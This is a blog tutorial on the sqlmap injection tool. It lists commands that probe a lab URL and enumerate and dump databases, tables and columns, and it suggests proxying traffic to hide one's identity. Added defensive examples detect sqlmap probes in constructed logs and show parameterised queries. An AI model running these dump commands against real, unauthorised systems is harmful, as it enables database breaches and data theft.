SQLMAP tool introduction, basic commands and simple use

Tool introduction

sqlmap is an automated SQL injection tool. It scans a given URL, discovers SQL injection vulnerabilities and exploits them automatically, and it ships with many built-in bypass (tamper) scripts.
It supports almost all common databases: MySQL, Oracle, Microsoft SQL Server, Microsoft Access, IBM DB2 and others.
It supports proxies and uses optimized detection algorithms, which makes it efficient.
It identifies the back-end database through fingerprinting.
When the database management system is MySQL, PostgreSQL or Microsoft SQL Server, it supports downloading and uploading files.
When the database management system is MySQL, PostgreSQL or Microsoft SQL Server, it supports executing arbitrary commands and retrieving their standard output.

sqlmap mainly uses the following five SQL injection techniques. (It also supports injection via GET, POST and cookie parameters.)

  1. Boolean-based blind injection: the injected condition is judged true or false from the content of the returned page.
  2. Time-based blind injection: when nothing can be inferred from the page content, a conditional time-delay statement is injected and the response time (whether it has increased) shows whether the statement executed.
  3. Error-based injection: information is read from the error message returned by the page, or the result of the injected statement is returned directly in the page.
  4. Union query injection: used when a "union" clause can be appended to the query.
  5. Stacked query injection: used when the target executes multiple statements in a single request.
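From the defender's side, each of the five techniques above leaves a recognisable trace in the web server's access log, which is usually where a sqlmap run is first noticed. The following Python script is an added example, not code from the original post or from sqlmap itself: it parses Apache combined-format log lines (constructed here, not real traffic), URL-decodes the query string, maps each request to the technique its payload resembles, and also flags sqlmap's default User-Agent string. The regular expressions are deliberately coarse heuristics written for this example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache combined-format log lines (not real traffic): one benign
# request, then one probe in the style of each technique listed above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli/Less-1/?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli/Less-1/?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /sqli/Less-1/?id=-1%20UNION%20ALL%20SELECT%201,2,3-- HTTP/1.1" 200 700 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /sqli/Less-1/?id=1;SELECT%201 HTTP/1.1" 500 100 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /sqli/Less-1/?id=1%27 HTTP/1.1" 500 100 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Heuristic signatures for four of the five techniques; error-based probing is
# recognised separately from the server's reaction (a quote plus a 5xx status).
TECHNIQUES = [
    ("boolean-based blind", re.compile(r"\b(and|or)\b\s+\d+\s*=\s*\d+", re.I)),
    ("time-based blind", re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor\s+delay)\b", re.I)),
    ("union query", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("stacked queries", re.compile(r";\s*(select|insert|update|delete|drop|exec)\b", re.I)),
]


def parse_line(line):
    """Return a dict with ip, status (int), ua and the URL-decoded query, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    path, _, query = rec["path"].partition("?")
    rec["path"] = path
    # Decode percent-encoding so payloads match the patterns regardless of encoding.
    rec["query"] = unquote_plus(query)
    return rec


def classify(rec):
    """List the techniques a parsed request resembles (empty list if benign)."""
    flags = [name for name, pat in TECHNIQUES if pat.search(rec["query"])]
    if rec["status"] >= 500 and ("'" in rec["query"] or '"' in rec["query"]):
        flags.append("error-based (quote triggered a server error)")
    if "sqlmap" in rec["ua"].lower():
        flags.append("sqlmap default user-agent")
    return flags


def detect(log_text):
    """Scan log text and return one hit record per suspicious request."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        flags = classify(rec)
        if flags:
            hits.append({"ip": rec["ip"], "query": rec["query"], "flags": flags})
    return hits


def suspicious_sources(hits, threshold=3):
    """Source IPs with at least `threshold` flagged requests, sorted."""
    counts = Counter(h["ip"] for h in hits)
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for h in found:
        print(h["ip"], repr(h["query"]), "->", ", ".join(h["flags"]))
    print("sources over threshold:", suspicious_sources(found))
```

The per-source threshold matters more than any single signature: a lone "AND 1=1" can be a false positive, but a burst of boolean, time-based and union probes against the same parameter from one address is the shape of an automated scan. Because sqlmap lets the operator change the User-Agent (and the post mentions proxying), the user-agent flag is a bonus signal, not something to rely on.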

Basic command

Precondition: the target has an injection point

sqlmap.py -u <URL>
Example: sqlmap.py -u http://192.168.0.1/sqli/Less-1/?id=1

When the URL carries two or more parameters, it must be enclosed in double quotes so that the shell does not interpret the "&".
Example: sqlmap.py -u "http://192.168.0.1/sqli/Less-1/?id=1&uid=2"

The default test level is 1; use --level to specify a higher level.

Get target

-d connects directly to the database; -u specifies the target URL:

sqlmap.py -u http://192.168.0.1/sqli/Less-1/?id=1

sqlmap -l parses targets from a log file (usually a Burp Suite proxy log, for automated batch testing)

sqlmap -x parses targets from a remote XML (sitemap) file (rarely used)

sqlmap -m scans multiple targets listed in a text file

sqlmap -r parses the target from a saved HTTP request file (usually used when the injection is in a cookie)
Example: sqlmap.py -r /root/desktop/1.txt

sqlmap -g uses Google search results as targets (cannot be used from inside mainland China)

Execute the test statement
Check the injection point:

sqlmap.py -u http://192.168.0.1/sqli/Less-1/?id=1

List the databases:

sqlmap.py -u http://192.168.0.1/sqli/Less-1/?id=1 --dbs

Specify the database name to list all of its tables (-D can be written as -dbs):

sqlmap.py -u http://192.168.0.1/sqli/Less-1/?id=1 -D <database> --tables

Specify the database and table name to list all columns (-T can be written as -tables):

sqlmap.py -u http://192.168.0.1/sqli/Less-1/?id=1 -D <database> -T <table> --columns

Specify the database, table and columns to dump the selected columns (--dump downloads the data):

sqlmap.py -u http://192.168.0.1/sqli/Less-1/?id=1 -D <database> -T <table> -C <column1>,<column2>,<column3> --dump

Alternatively, skip enumerating the database and run --dump-all directly; the drawback is that the volume of data is large and the download is slow.
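Every command above rests on the precondition stated at the start of this section: an injection point, which in practice means a query built by splicing client input into SQL text. The following Python snippet is an added example (not from the post or from sqlmap) built on an in-memory SQLite database constructed inline. It puts the vulnerable pattern next to its fix and runs the boolean truth test from technique 1 against each, so you can see why one is enumerable and the other is not.

```python
import sqlite3


def make_db():
    # Constructed in-memory sample database standing in for the target's back end.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return conn


def lookup_vulnerable(conn, id_param):
    # The injection point: client input is concatenated into the SQL text, so the
    # database parses whatever the parameter contains as part of the query.
    sql = f"SELECT name FROM users WHERE id = {id_param}"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, id_param):
    # The fix: validate the type, then bind the value as a parameter. The SQL text
    # never changes, so the input can only ever be compared as a literal value.
    try:
        id_value = int(id_param)
    except (TypeError, ValueError):
        return []  # reject malformed input instead of sending it to the database
    return [row[0] for row in conn.execute("SELECT name FROM users WHERE id = ?", (id_value,))]


def boolean_oracle(lookup, conn):
    # Technique 1 (boolean-based blind) reduced to its essence: issue a condition
    # that is always true and one that is always false. If the two responses
    # differ, the back end is evaluating attacker-controlled conditions.
    true_case = lookup(conn, "1 AND 1=1")
    false_case = lookup(conn, "1 AND 1=2")
    return true_case != false_case


if __name__ == "__main__":
    db = make_db()
    print("concatenated query differs on true/false:", boolean_oracle(lookup_vulnerable, db))
    print("parameterised query differs on true/false:", boolean_oracle(lookup_safe, db))
```

The parameterised version fails the oracle because "1 AND 1=1" is not an integer and is rejected before any SQL runs; even without the int() check, a bound parameter is compared as a single value, never parsed as SQL. Closing the injection point this way removes the precondition for every enumeration command in this section at once, which is why parameterised queries, not input filtering, are the primary mitigation.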

Additional options

Several other options may be useful; they are simply appended to the end of the command, and more can be found in the official documentation.

--cookie=COOKIE: where the target requires a login, supply the cookie of a logged-in session.

--proxy="http://127.0.0.1:8087": send the traffic through an HTTP proxy to hide your identity, for example GoAgent.

--sql-query=QUERY: execute a SQL statement of your choice, though the target may not support it.

--batch: answer every prompt with the default (Y) so that no manual selection is needed; when running unattended, sqlmap automatically picks what it considers the optimal choice.


Source: blog.csdn.net/weixin_42250835/article/details/111830324